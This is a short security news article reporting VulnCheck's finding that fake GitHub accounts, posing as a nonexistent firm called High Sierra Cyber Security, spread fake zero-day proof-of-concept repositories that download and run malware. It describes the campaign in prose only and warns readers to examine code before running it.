Fraudulent GitHub intrusion: fake accounts spread malware
A network of fake researchers is using GitHub to spread malicious code masquerading as proofs of concept for unknown vulnerabilities
Several fake GitHub accounts associated with a fraudulent cybersecurity firm have been spotted for spreading malicious repositories on the code hosting service. Seven of these repositories, still accessible at the time of writing, pose as test exploits (PoCs) for alleged zero-day vulnerabilities in Discord, Google Chrome, and Microsoft Exchange.
A network of lies
VulnCheck, which discovered the activity, said the authors of these repositories have put a lot of effort into making them plausible. They set up a series of Twitter accounts and profiles, pretending to be members of a non-existent company called High Sierra Cyber Security. VulnCheck first discovered these repositories last May, when they were being used to spread similar PoC exploits for zero-day vulnerabilities in Signal and WhatsApp, both of which have now been removed.
Mask the culprits
Not only did the authors share some of their alleged findings on Twitter to boost their legitimacy, but they even used images of real security researchers from companies like Rapid7, demonstrating significant effort in building the campaign. The PoC is a Python script designed to download a malicious binary and run it on the victim's operating system, be it Windows or Linux. “The attacker put a lot of effort into creating all these fake identities, just to distribute easily recognizable malware,” said VulnCheck researcher Jacob Baines. "It is unclear whether they have been successful, but the fact that they continue to pursue this attack strategy suggests that they believe they may be."
Final considerations on information security
It is currently unknown whether the perpetrator of these activities is a rookie actor or an advanced persistent threat (APT). However, security researchers have already been targeted by domestic North Korean groups in the past, as revealed by Google in January 2021. These events underscore the importance of exercising caution when downloading code from open source repositories. It is imperative that users carefully examine code before execution to ensure that it does not pose a security risk.
Follow us on WhatsApp for more pills like this06/14/2023 11:02
Marco Verro